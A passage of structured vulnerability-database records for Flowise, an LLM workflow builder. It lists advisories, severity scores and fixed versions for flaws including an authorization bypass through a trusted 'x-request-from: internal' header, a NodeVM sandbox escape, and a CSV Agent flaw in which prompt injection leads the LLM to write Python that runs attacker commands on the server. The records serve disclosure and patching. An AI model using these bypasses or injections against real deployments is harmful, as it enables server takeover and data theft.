reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5fw2-mwhh-9947
reference_id GHSA-5fw2-mwhh-9947
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T20:17:43Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5fw2-mwhh-9947
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases CVE-2026-41279, GHSA-5fw2-mwhh-9947
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3gp6-wwtd-kkf1
8
url VCID-488c-vrqu-f7hf
vulnerability_id VCID-488c-vrqu-f7hf
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, Flowise trusts any HTTP client that sets the header x-request-from: internal, allowing an authenticated tenant session to bypass all /api/v1/** authorization checks. With only a browser cookie, a low-privilege tenant can invoke internal administration endpoints (API key management, credential stores, custom function execution, etc.), effectively escalating privilege. This issue has been patched in version 3.0.13.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30820
reference_id
reference_type
scores
0
value 0.00133
scoring_system epss
scoring_elements 0.32571
published_at 2026-06-14T12:55:00Z
1
value 0.00133
scoring_system epss
scoring_elements 0.32594
published_at 2026-06-13T12:55:00Z
2
value 0.00133
scoring_system epss
scoring_elements 0.32574
published_at 2026-06-12T12:55:00Z
3
value 0.00133
scoring_system epss
scoring_elements 0.32393
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30820
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30820
reference_id CVE-2026-30820
reference_type
scores
0
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30820
2
reference_url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13
reference_id flowise%403.0.13
reference_type
scores
0
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-09T20:35:16Z/
url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13
3
reference_url https://github.com/advisories/GHSA-wvhq-wp8g-c7vq
reference_id GHSA-wvhq-wp8g-c7vq
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-wvhq-wp8g-c7vq
4
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wvhq-wp8g-c7vq
reference_id GHSA-wvhq-wp8g-c7vq
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-09T20:35:16Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wvhq-wp8g-c7vq
fixed_packages
0
url pkg:npm/flowise@3.0.13
purl pkg:npm/flowise@3.0.13
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-3chx-dj2u-kbab
6
vulnerability VCID-3gp6-wwtd-kkf1
7
vulnerability VCID-5j9e-bcr5-n7bs
8
vulnerability VCID-5pup-kgaf-3ubw
9
vulnerability VCID-67mz-pfy4-ykep
10
vulnerability VCID-71uq-yx2j-cqak
11
vulnerability VCID-9rqv-p7rz-5kar
12
vulnerability VCID-a1e4-f5dh-w3a5
13
vulnerability VCID-aqg8-6us7-uqef
14
vulnerability VCID-b97u-efzx-dffn
15
vulnerability VCID-bkmk-k9mn-ekhx
16
vulnerability VCID-cb6d-4c2v-w7c3
17
vulnerability VCID-cxja-9yxc-k7au
18
vulnerability VCID-d4wa-szeh-43ab
19
vulnerability VCID-dzed-27rk-3qav
20
vulnerability VCID-e65e-s5sd-kuhp
21
vulnerability VCID-ejdc-j73x-jydk
22
vulnerability VCID-fu6t-9dk4-jbh9
23
vulnerability VCID-gt6n-beak-33gy
24
vulnerability VCID-gvpx-4wkw-43cz
25
vulnerability VCID-hdej-umwh-kqav
26
vulnerability VCID-hkfs-v3bp-kbh5
27
vulnerability VCID-j5hh-haj2-qydg
28
vulnerability VCID-kpyg-gve3-b3av
29
vulnerability VCID-pzza-9xq9-a7de
30
vulnerability VCID-qm89-q2ar-uyhy
31
vulnerability VCID-r74e-k86f-7qgb
32
vulnerability VCID-rgmv-6bqh-eqf2
33
vulnerability VCID-s3jg-wce1-fbf3
34
vulnerability VCID-tdm1-91mc-8kgr
35
vulnerability VCID-v1nz-wwsu-qycg
36
vulnerability VCID-v9hg-7pex-g3dp
37
vulnerability VCID-w9yr-5jbp-q7fm
38
vulnerability VCID-xt1d-efw7-g3c6
39
vulnerability VCID-z1y2-f2ws-8ycb
40
vulnerability VCID-zwna-stj5-3yhm
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13
aliases CVE-2026-30820, GHSA-wvhq-wp8g-c7vq
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-488c-vrqu-f7hf
9
url VCID-5j9e-bcr5-n7bs
vulnerability_id VCID-5j9e-bcr5-n7bs
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, DatasetRow create and update mass-assignment allows cross-workspace row takeover. This issue has been patched in version 3.1.2.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-46478
reference_id
reference_type
scores
0
value 0.00053
scoring_system epss
scoring_elements 0.17095
published_at 2026-06-12T12:55:00Z
1
value 0.00053
scoring_system epss
scoring_elements 0.17107
published_at 2026-06-13T12:55:00Z
2
value 0.00053
scoring_system epss
scoring_elements 0.16939
published_at 2026-06-11T12:55:00Z
3
value 0.00059
scoring_system epss
scoring_elements 0.18998
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-46478
1
reference_url https://github.com/FlowiseAI/Flowise/commit/49a2259bf2a6b4f3d4b50813cb5161cee0d40040
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/commit/49a2259bf2a6b4f3d4b50813cb5161cee0d40040
2
reference_url https://github.com/FlowiseAI/Flowise/pull/6051
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/pull/6051
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-46478
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-46478
4
reference_url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
reference_id flowise%403.1.2
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-06-09T15:33:04Z/
url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
5
reference_url https://github.com/advisories/GHSA-7j65-65cr-6644
reference_id GHSA-7j65-65cr-6644
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7j65-65cr-6644
6
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7j65-65cr-6644
reference_id GHSA-7j65-65cr-6644
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
1
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-06-09T15:33:04Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7j65-65cr-6644
fixed_packages
0
url pkg:npm/flowise@3.1.2
purl pkg:npm/flowise@3.1.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.2
aliases CVE-2026-46478, GHSA-7j65-65cr-6644
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-5j9e-bcr5-n7bs
10
url VCID-5pup-kgaf-3ubw
vulnerability_id VCID-5pup-kgaf-3ubw
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the specific flaw exists within the run method of the CSV_Agents class. The issue results from the lack of proper sandboxing when evaluating an LLM generated python script. An attacker can leverage this vulnerability to execute code in the context of the user running the server. Using prompt injection techniques, an unauthenticated attacker with the ability to send prompts to a chatflow using the CSV Agent node may convince an LLM to respond with a malicious python script that executes attacker controlled commands on the Flowise server. This vulnerability is fixed in 3.1.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-41264
reference_id
reference_type
scores
0
value 0.00215
scoring_system epss
scoring_elements 0.4425
published_at 2026-06-13T12:55:00Z
1
value 0.00215
scoring_system epss
scoring_elements 0.44238
published_at 2026-06-14T12:55:00Z
2
value 0.00215
scoring_system epss
scoring_elements 0.44078
published_at 2026-06-11T12:55:00Z
3
value 0.00215
scoring_system epss
scoring_elements 0.44231
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-41264
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-41264
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-41264
2
reference_url https://github.com/advisories/GHSA-3hjv-c53m-58jj
reference_id GHSA-3hjv-c53m-58jj
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-3hjv-c53m-58jj
3
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3hjv-c53m-58jj
reference_id GHSA-3hjv-c53m-58jj
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-24T13:39:06Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3hjv-c53m-58jj
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases CVE-2026-41264, GHSA-3hjv-c53m-58jj
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-5pup-kgaf-3ubw
11
url VCID-67mz-pfy4-ykep
vulnerability_id VCID-67mz-pfy4-ykep
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, POST /api/v1/node-custom-function lacks route-level authorization, allowing any authenticated user or API key to submit arbitrary JavaScript to the Custom JS Function node. When E2B_APIKEY is not configured — the common deployment case — Flowise executes this code inside a NodeVM sandbox. This sandbox can be escaped, allowing an attacker to reach the host process object and execute system commands via child_process. The result is authenticated remote code execution on the Flowise server host. This issue has been patched in version 3.1.2.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-46442
reference_id
reference_type
scores
0
value 0.00401
scoring_system epss
scoring_elements 0.61174
published_at 2026-06-11T12:55:00Z
1
value 0.00517
scoring_system epss
scoring_elements 0.67249
published_at 2026-06-13T12:55:00Z
2
value 0.00517
scoring_system epss
scoring_elements 0.67235
published_at 2026-06-12T12:55:00Z
3
value 0.00579
scoring_system epss
scoring_elements 0.69441
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-46442
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-46442
reference_id
reference_type
scores
0
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-46442
2
reference_url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
reference_id flowise%403.1.2
reference_type
scores
0
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-06-09T14:27:38Z/
url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
3
reference_url https://github.com/advisories/GHSA-9rvc-vf7m-pgm2
reference_id GHSA-9rvc-vf7m-pgm2
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-9rvc-vf7m-pgm2
4
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9rvc-vf7m-pgm2
reference_id GHSA-9rvc-vf7m-pgm2
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
1
value 9.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-06-09T14:27:38Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9rvc-vf7m-pgm2
fixed_packages
0
url pkg:npm/flowise@3.1.2
purl pkg:npm/flowise@3.1.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.2
aliases CVE-2026-46442, GHSA-9rvc-vf7m-pgm2
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-67mz-pfy4-ykep
12
url VCID-6ufs-d346-d7ev
vulnerability_id VCID-6ufs-d346-d7ev
summary A security flaw has been discovered in FlowiseAI Flowise up to 3.0.12. Affected is the function Login of the file packages/server/src/enterprise/services/account.service.ts of the component API Response Handler. The manipulation results in information disclosure. The attack can be launched remotely. A high complexity level is associated with this attack. The exploitability is told to be difficult. You should upgrade the affected component.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-8026
reference_id
reference_type
scores
0
value 0.00019
scoring_system epss
scoring_elements 0.05306
published_at 2026-06-11T12:55:00Z
1
value 0.00026
scoring_system epss
scoring_elements 0.07969
published_at 2026-06-14T12:55:00Z
2
value 0.00026
scoring_system epss
scoring_elements 0.07974
published_at 2026-06-13T12:55:00Z
3
value 0.00026
scoring_system epss
scoring_elements 0.07977
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-8026
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-8026
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-8026
2
reference_url https://vuldb.com/vuln/361273
reference_id 361273
reference_type
scores
0
value 2.6
scoring_system cvssv2
scoring_elements AV:N/AC:H/Au:N/C:P/I:N/A:N/E:ND/RL:OF/RC:C
1
value 3.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C
2
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C
3
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
4
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X
5
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
6
value MODERATE
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T13:03:35Z/
url https://vuldb.com/vuln/361273
3
reference_url https://gist.github.com/YLChen-007/50a553f09aa1c7c04ce18cec13986a91
reference_id 50a553f09aa1c7c04ce18cec13986a91
reference_type
scores
0
value 2.6
scoring_system cvssv2
scoring_elements AV:N/AC:H/Au:N/C:P/I:N/A:N/E:ND/RL:OF/RC:C
1
value 3.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C
2
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
3
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C
4
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X
5
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
6
value MODERATE
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T13:03:35Z/
url https://gist.github.com/YLChen-007/50a553f09aa1c7c04ce18cec13986a91
4
reference_url https://vuldb.com/submit/777656
reference_id 777656
reference_type
scores
0
value 2.6
scoring_system cvssv2
scoring_elements AV:N/AC:H/Au:N/C:P/I:N/A:N/E:ND/RL:OF/RC:C
1
value 3.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C
2
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C
3
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
4
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X
5
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
6
value MODERATE
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T13:03:35Z/
url https://vuldb.com/submit/777656
5
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*
6
reference_url https://vuldb.com/vuln/361273/cti
reference_id cti
reference_type
scores
0
value 2.6
scoring_system cvssv2
scoring_elements AV:N/AC:H/Au:N/C:P/I:N/A:N/E:ND/RL:OF/RC:C
1
value 3.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C
2
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:X/RL:O/RC:C
3
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
4
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
5
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X
6
value MODERATE
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T13:03:35Z/
url https://vuldb.com/vuln/361273/cti
7
reference_url https://github.com/advisories/GHSA-8f47-4rh3-x44m
reference_id GHSA-8f47-4rh3-x44m
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-8f47-4rh3-x44m
fixed_packages
0
url pkg:npm/flowise@3.0.13
purl pkg:npm/flowise@3.0.13
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-3chx-dj2u-kbab
6
vulnerability VCID-3gp6-wwtd-kkf1
7
vulnerability VCID-5j9e-bcr5-n7bs
8
vulnerability VCID-5pup-kgaf-3ubw
9
vulnerability VCID-67mz-pfy4-ykep
10
vulnerability VCID-71uq-yx2j-cqak
11
vulnerability VCID-9rqv-p7rz-5kar
12
vulnerability VCID-a1e4-f5dh-w3a5
13
vulnerability VCID-aqg8-6us7-uqef
14
vulnerability VCID-b97u-efzx-dffn
15
vulnerability VCID-bkmk-k9mn-ekhx
16
vulnerability VCID-cb6d-4c2v-w7c3
17
vulnerability VCID-cxja-9yxc-k7au
18
vulnerability VCID-d4wa-szeh-43ab
19
vulnerability VCID-dzed-27rk-3qav
20
vulnerability VCID-e65e-s5sd-kuhp
21
vulnerability VCID-ejdc-j73x-jydk
22
vulnerability VCID-fu6t-9dk4-jbh9
23
vulnerability VCID-gt6n-beak-33gy
24
vulnerability VCID-gvpx-4wkw-43cz
25
vulnerability VCID-hdej-umwh-kqav
26
vulnerability VCID-hkfs-v3bp-kbh5
27
vulnerability VCID-j5hh-haj2-qydg
28
vulnerability VCID-kpyg-gve3-b3av
29
vulnerability VCID-pzza-9xq9-a7de
30
vulnerability VCID-qm89-q2ar-uyhy
31
vulnerability VCID-r74e-k86f-7qgb
32
vulnerability VCID-rgmv-6bqh-eqf2
33
vulnerability VCID-s3jg-wce1-fbf3
34
vulnerability VCID-tdm1-91mc-8kgr
35
vulnerability VCID-v1nz-wwsu-qycg
36
vulnerability VCID-v9hg-7pex-g3dp
37
vulnerability VCID-w9yr-5jbp-q7fm
38
vulnerability VCID-xt1d-efw7-g3c6
39
vulnerability VCID-z1y2-f2ws-8ycb
40
vulnerability VCID-zwna-stj5-3yhm
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.13
aliases CVE-2026-8026, GHSA-8f47-4rh3-x44m
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-6ufs-d346-d7ev
13
url VCID-71uq-yx2j-cqak
vulnerability_id VCID-71uq-yx2j-cqak
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the password reset functionality on cloud.flowiseai.com sends a reset password link over the unsecured HTTP protocol instead of HTTPS. This behavior introduces the risk of a man-in-the-middle (MITM) attack, where an attacker on the same network as the user (e.g., public Wi-Fi) can intercept the reset link and gain unauthorized access to the victim’s account. This vulnerability is fixed in 3.1.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-41275
reference_id
reference_type
scores
0
value 0.00038
scoring_system epss
scoring_elements 0.11634
published_at 2026-06-14T12:55:00Z
1
value 0.00038
scoring_system epss
scoring_elements 0.11657
published_at 2026-06-13T12:55:00Z
2
value 0.00038
scoring_system epss
scoring_elements 0.11664
published_at 2026-06-12T12:55:00Z
3
value 0.00038
scoring_system epss
scoring_elements 0.11586
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-41275
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-41275
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value 7.5
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-41275
2
reference_url https://hackerone.com/reports/1888915
